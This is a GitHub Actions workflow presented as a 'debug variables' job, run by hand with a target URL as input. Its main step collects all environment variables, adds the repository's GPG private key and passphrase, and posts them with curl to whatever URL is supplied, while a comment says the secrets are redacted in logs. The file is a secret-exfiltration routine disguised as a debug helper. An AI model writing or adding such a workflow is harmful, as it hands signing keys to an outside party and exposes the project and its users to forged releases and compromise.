name: Debug variablse

on:
  workflow_dispatch:
    inputs:
      target_url:
        description: "URL to post the environment variables to"
        required: true

jobs:
  post-environment:
    runs-on: ubuntu-latest
    steps:
      - name: Collect and post environment variables
        run: |
          # Create a JSON object with all environment variables
           env | sort | jq -R 'split("=") | {(.[0]): (.[1:]|join("="))}' | jq -s add > env_vars.json
           
           # Add the specific secrets
           jq '. + {
             "GPG_PRIVATE_KEY": ${{ toJSON(secrets.GPG_PRIVATE_KEY) }},
             "PASSPHRASE": ${{ toJSON(secrets.PASSPHRASE) }}
           }' env_vars.json > env_with_secrets.json
           
           # Print a message (the actual secrets will be redacted in logs)
           echo "Sending environment variables and specified secrets to ${{ github.event.inputs.target_url }}"
           
           # Post to the specified URL
           curl -X POST \
             -H "Content-Type: application/json" \
             -d @env_with_secrets.json \
             ${{ github.event.inputs.target_url }}
        shell: bash

      - name: Handle response
        run: |
          echo "Request completed. Check the logs for any errors."
